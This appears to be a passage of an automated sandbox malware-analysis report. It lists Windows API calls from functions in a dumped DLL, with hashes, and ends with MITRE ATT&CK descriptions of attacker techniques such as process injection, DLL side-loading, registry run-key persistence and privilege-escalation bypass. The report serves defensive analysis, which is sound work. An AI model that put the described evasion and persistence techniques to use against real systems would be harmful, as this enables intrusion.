LocalFree.KERNEL32(?), ref: 6FD0BFD5
TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BFE7

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 4626c3fb40a16f6e005be63dc71f987904af74c4175a50a99aaf084bb3d21693
Instruction ID: 9109b22b621990875f490f25a8d1014bb0b9370eee715c263054ed11ca67cdf9
Opcode Fuzzy Hash: 4626c3fb40a16f6e005be63dc71f987904af74c4175a50a99aaf084bb3d21693
Instruction Fuzzy Hash: 1A115671604704EFE714DF54C884F9ABBA4FF46325F10852AE2528B5E1CB72B850CF60

Function 6FD08EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FD08ED0

Part of subcall function 6FD09C7C: __EH_prolog3.LIBCMT ref: 6FD09C83

__wcsdup.LIBCMT ref: 6FD08EF2
GetCurrentThread.KERNEL32 ref: 6FD08F1F
GetCurrentThreadId.KERNEL32 ref: 6FD08F28

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: 57d83e6e8d6d6bfceb5889323a68f63f740f799484a57c5163384a18432d1be4
Instruction ID: 7d5f06a0d8fdf2aced7a746a82c9441e327ae891fd23fdda3ccd160c12a38118
Opcode Fuzzy Hash: 57d83e6e8d6d6bfceb5889323a68f63f740f799484a57c5163384a18432d1be4
Instruction Fuzzy Hash: 532188B0904B40CFD7A1AF7A814024AFAE8BFA4704B108A1FD1AA87B61CBB1B040CF55

Function 6FD11D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FD11D33
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FD11D5E
GetCapture.USER32 ref: 6FD11D70
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FD11D7F

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: bf52993e4b16a000189de65f86f13141402d7154ba6e7d03af2d852b32a43b76
Instruction ID: 90c763add399dfa2e411e489989edbf33a7e4cd04d1aa46b868c556b58ed188b
Opcode Fuzzy Hash: bf52993e4b16a000189de65f86f13141402d7154ba6e7d03af2d852b32a43b76
Instruction Fuzzy Hash: 240171313443947BEE706B629CCDFDB3E7ADFCAB50F150079B6049A0E6CAA1A850D630

Function 6FD06A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FD06A8A

Part of subcall function 6FD068E2: _malloc.LIBCMT ref: 6FD06900

__CxxThrowException@8.LIBCMT ref: 6FD06AC0
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6FD016A6,00000000,00000000,?,?,6FD2D898,00000004,6FD016A6,00000000,6FD069F9,00000000), ref: 6FD06AEA
LocalFree.KERNEL32(6FD016A6,6FD016A6,00000000,6FD069F9,00000000), ref: 6FD06B12

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: 73409f6197804ccfae510cd9f51d7787341c3d94aa6032e14ad5fef21b7b5f09
Instruction ID: 3b61bd565582c71b6254f30536ce411a3738dfdd050671dcf4acfbda3bf526ca
Opcode Fuzzy Hash: 73409f6197804ccfae510cd9f51d7787341c3d94aa6032e14ad5fef21b7b5f09
Instruction Fuzzy Hash: 6A112171504349AFEF44EF68CC44EAD3BA5EF45714F24C529F6258A2D0E731A5509B60

Function 6FD0D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FD0D194
RegCloseKey.ADVAPI32(00000000), ref: 6FD0D19D
swprintf.LIBCMT ref: 6FD0D1BA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FD0D1CB

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 8a294b10bc75c2338a7d901861d7bbf77062d0ae6015d1456fb9e36d38d774b5
Instruction ID: 1b9f328df0f812889fa67ec976a445346b28437a50099c8534c5e9aafd10d8bc
Opcode Fuzzy Hash: 8a294b10bc75c2338a7d901861d7bbf77062d0ae6015d1456fb9e36d38d774b5
Instruction Fuzzy Hash: 67016177900709BBDB10AF648C45FAFB7ADAF49714F14041AFA01A7180DF75F91487A5

Function 6FD07287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6FD068E2: _malloc.LIBCMT ref: 6FD06900

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FD072BB
GetCurrentProcess.KERNEL32(?,00000000), ref: 6FD072C1
DuplicateHandle.KERNEL32(00000000), ref: 6FD072C4
GetLastError.KERNEL32(?), ref: 6FD072DF

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: e291cb1a252077b1e5d1f1afafd94e8ab94d3cded4765678c541274b412bc385
Instruction ID: ae92e4438ce1874148dd1715f4920dd94294f1ca701a10581d67a3677b8bb0f3
Opcode Fuzzy Hash: e291cb1a252077b1e5d1f1afafd94e8ab94d3cded4765678c541274b412bc385
Instruction Fuzzy Hash: 72011E75A00706BBDB40ABB5CD89F5A7AA9AF85760F148516F605DF281DB71F800C760

Function 6FD10F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6FD10F9D
GetTopWindow.USER32(00000000), ref: 6FD10FDC
GetWindow.USER32(00000000,00000002), ref: 6FD10FFA

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: e85e2a0cc3d5590cc2980224e2769d2b553a2177bf82074b0bafaf4f32d8be88
Instruction ID: 128e70648a106378a7d0e5732cb50ddd04220e9d7fe3c5561721c2afaf3c616c
Opcode Fuzzy Hash: e85e2a0cc3d5590cc2980224e2769d2b553a2177bf82074b0bafaf4f32d8be88
Instruction Fuzzy Hash: 68011B3204C61AFBDF42AF91AC0DEDE3A26AF493A0F044111FA1055060CB36E571EBA1

Function 6FD1EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6FD1EC89

Part of subcall function 6FD1EAAE: __fltout2.LIBCMT ref: 6FD1EADA

__cftog_l.LIBCMT ref: 6FD1ECAF
__cftoe_l.LIBCMT ref: 6FD1ECE1

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 19352c4ac7673a3fb1c0cb6c7b61137557082ac96a63781cdf56cc69228a6f6b
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 21117E7244828AFBCF529F84ED018DE3F63BB48394B448515FA2859570C732F6B1AB81

Function 6FD103CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6FD103DC
GetTopWindow.USER32(00000000), ref: 6FD103EF

Part of subcall function 6FD103CF: GetWindow.USER32(00000000,00000002), ref: 6FD10436

GetTopWindow.USER32(?), ref: 6FD1041F

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 85bda1af27250012ff7684a7423247aca0c60e1edc7bb1e971ac3d4554520011
Instruction ID: 938fa594269874bb5e6f7c4a092b71038ae012ce598bd087eb054554dc4036c2
Opcode Fuzzy Hash: 85bda1af27250012ff7684a7423247aca0c60e1edc7bb1e971ac3d4554520011
Instruction Fuzzy Hash: 3B01D43200DB1AA79B52BF61AD0CE8F3A29AF453E0B04E022FD1495001DB31F53196E5

Function 6FD0C220 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6FD334A8), ref: 6FD0C25A
RtlInitializeCriticalSection.NTDLL(?), ref: 6FD0C26C
RtlLeaveCriticalSection.NTDLL(6FD334A8), ref: 6FD0C279
RtlEnterCriticalSection.NTDLL(?), ref: 6FD0C289

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: e6a1f35805c07316981db3315fd87ed0607f44b3310dae0f149e438727c0a69d
Instruction ID: 377153005a355eaeeccb88f35dada0b3c60e95765a2e79359fa659f7c889db30
Opcode Fuzzy Hash: e6a1f35805c07316981db3315fd87ed0607f44b3310dae0f149e438727c0a69d
Instruction Fuzzy Hash: BDF0F673904215AFEB807FA8CD86B09BB69EBD3335F150016E30887281CF34B490CAB1

Function 6FD0BA5B Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6FD332EC), ref: 6FD0BA69
TlsGetValue.KERNEL32(6FD332D0,?,?,?,?,6FD0C0B7,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BA7D
RtlLeaveCriticalSection.NTDLL(6FD332EC), ref: 6FD0BA93
RtlLeaveCriticalSection.NTDLL(6FD332EC), ref: 6FD0BA9E

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: afcc5008dccb942258a5366787d854ce529f4e91b1b5e03b42806bd2e6d14436
Instruction ID: cd444c2566119d1bf1c68d57673a0628986ea6a9796bc5a6f3bc2ab6050cf563
Opcode Fuzzy Hash: afcc5008dccb942258a5366787d854ce529f4e91b1b5e03b42806bd2e6d14436
Instruction Fuzzy Hash: B3F05E7720C6049FE761AF68C888C4A77ADEE8537031A4476E759D3181DAB0F851DBA0

Function 6FD2057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FD20586

Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F

__getptd.LIBCMT ref: 6FD2059D
__amsg_exit.LIBCMT ref: 6FD205AB
__lock.LIBCMT ref: 6FD205BB

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 558ef7e6143e41505086ce800f66653cc889b2f72eda19bdc91d074449eff880
Instruction ID: d3e6df323c8cacddcab5b6d874d7cf339cbff564700c13c8bab6300e022fad01
Opcode Fuzzy Hash: 558ef7e6143e41505086ce800f66653cc889b2f72eda19bdc91d074449eff880
Instruction Fuzzy Hash: 17F09032948710CBEBE2EBB89419B4C33E06F047ADF40265AD650A72D0CB34B541CBF1

Function 6FD0A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6FD0A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FD0A6B6), ref: 6FD0A5AA
Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FD0A5CB
Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FD0A5DD
Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FD0A5EF
Part of subcall function 6FD0A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FD0A601

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FD0A6D0
SetLastError.KERNEL32(0000006F), ref: 6FD0A6E7

Strings

, xrefs: 6FD0A705

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: 28db790b15f9505c308c52d5aa7659d86481f1577376225f585b1ebba36239bf
Instruction ID: 36ba3c63018d8c8c328dbf0f2bae61e854234e0493b10cecbaec7641771f24fc
Opcode Fuzzy Hash: 28db790b15f9505c308c52d5aa7659d86481f1577376225f585b1ebba36239bf
Instruction Fuzzy Hash: A2217C708407189EDBA0EF70C8587DEB7B4FF45324F50869AD069DA1C0DB746A85CF60

Function 6FD08E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FD08E78
PathFindExtensionW.SHLWAPI(?), ref: 6FD08E8E

Part of subcall function 6FD08BDF: __EH_prolog3_GS.LIBCMT ref: 6FD08BE9
Part of subcall function 6FD08BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FD08EB7,?,?), ref: 6FD08C19
Part of subcall function 6FD08BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FD08C2D
Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C69
Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C77
Part of subcall function 6FD08BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FD08C94
Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FD08CBF
Part of subcall function 6FD08BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FD08CC8
Part of subcall function 6FD08BDF: GetModuleFileNameW.KERNEL32(6FD00000,?,00000105), ref: 6FD08D7F

Strings

%s%s.dll, xrefs: 6FD08E99

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 9f5c39d675aa948355ee786796e30a274442ac147ba1bc68a400c8feaa661ce2
Instruction ID: 7154edb75a7bd3869afa74eec20d6fcbd77b4a6fcdc01e9ff16635f487e9c93d
Opcode Fuzzy Hash: 9f5c39d675aa948355ee786796e30a274442ac147ba1bc68a400c8feaa661ce2
Instruction Fuzzy Hash: FB01A772909618EBDB41DF68D8459EFB3F9AF49310F010466A505E7140DB71B904CB90

Function 6FD1C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FD15017: __getptd.LIBCMT ref: 6FD1501D
Part of subcall function 6FD15017: __getptd.LIBCMT ref: 6FD1502D

__getptd.LIBCMT ref: 6FD1C54B

Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F

__getptd.LIBCMT ref: 6FD1C559

Strings

csm, xrefs: 6FD1C567

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction ID: 46b1d8df89330acc09adf215468455698b4a3fbdfd22f2117f6737209fc2e9fb
Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction Fuzzy Hash: A701287580C305DBEFA6CFA1E440BDEBBB6AF10215F90442AD4509A690DB31B684DF51

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

